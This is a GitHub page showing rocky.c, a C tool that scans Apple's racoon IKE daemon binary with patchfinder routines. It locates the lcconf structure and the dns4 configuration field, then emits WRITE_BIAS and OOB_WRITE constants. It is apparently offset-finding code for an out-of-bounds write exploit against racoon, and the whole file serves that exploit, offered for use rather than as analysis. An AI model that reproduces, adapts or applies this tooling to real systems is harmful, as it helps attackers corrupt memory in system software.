-
Notifications
You must be signed in to change notification settings - Fork 46
/
rocky.c
127 lines (113 loc) · 3 KB
/
rocky.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#include <assert.h>
#include <err.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach-o/loader.h>
#include "patchfinder64.c"
static addr_t
offsetof__struct_localconf__retry_counter(const uint8_t *p, off_t sz)
{
addr_t ref, bof, call, val;
uint8_t *q = boyermoore_horspool_memmem(p, sz, (uint8_t *)"Adding NON-ESP marker\n", sizeof("Adding NON-ESP marker\n") - 1);
assert(q);
ref = xref64(p, 0, q - p, q - p);
assert(ref);
bof = bof64(p, 0, ref);
assert(bof);
call = find_call64(p, bof, ref - bof);
assert(call);
val = calc64(p, bof, call, 8);
assert(val);
return val;
}
static addr_t
addressof__lcconf(const uint8_t *p, off_t sz)
{
addr_t ref, bof, call, val;
uint8_t *q = boyermoore_horspool_memmem(p, sz, (uint8_t *)"Adding NON-ESP marker\n", sizeof("Adding NON-ESP marker\n") - 1);
assert(q);
ref = xref64(p, 0, q - p, q - p);
assert(ref);
bof = bof64(p, 0, ref);
assert(bof);
call = find_call64(p, bof, ref - bof);
assert(call);
val = calc64(p, bof, call, 26);
assert(val);
return val;
}
static addr_t
addressof__isakmp_cfg_config__dns4(const uint8_t *p, off_t sz)
{
addr_t ref, bof, call, val;
uint8_t *q = boyermoore_horspool_memmem(p, sz, (uint8_t *)"bad IPv4 DNS address.", sizeof("bad IPv4 DNS address.") - 1);
assert(q);
ref = xref64(p, 0, q - p, q - p);
assert(ref);
val = calc64(p, ref - 64, ref, 10);
assert(val);
val -= 12;
return val;
}
static int
really(const uint8_t *p, off_t sz, const char *output)
{
addr_t bias = offsetof__struct_localconf__retry_counter(p, sz);
long lcconf = addressof__lcconf(p, sz);
long dns4 = addressof__isakmp_cfg_config__dns4(p, sz);
long distance = (lcconf - dns4) / 4;
FILE *f = stdout;
if (output) {
f = fopen(output, "wt");
}
fprintf(f, "// automatically generated by rocky. do not edit\n");
fprintf(f, "#define WRITE_BIAS 0x%llx\n", bias);
fprintf(f, "#define OOB_WRITE %ld\n", distance);
if (output) {
fclose(f);
}
return 0;
}
static int
do_the_racoon(const char *filename, const char *output)
{
int rv;
int fd;
uint8_t *p;
off_t sz;
fd = open(filename, O_RDONLY);
if (fd < 0) {
fprintf(stderr, "error: cannot open %s\n", filename);
return -1;
}
sz = lseek(fd, 0, SEEK_END);
p = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0);
if (p == MAP_FAILED) {
close(fd);
fprintf(stderr, "error: cannot map %s\n", filename);
return -1;
}
assert(MACHO(p));
rv = really(p, sz, output);
munmap(p, sz);
close(fd);
if (rv != 0) {
fprintf(stderr, "error: cannot parse %s\n", filename);
return -1;
}
return 0;
}
int
main(int argc, char **argv)
{
if (argc < 2) {
printf("usage: %s racoon [output]\n", argv[0]);
return 1;
}
return do_the_racoon(argv[1], argv[2]);
}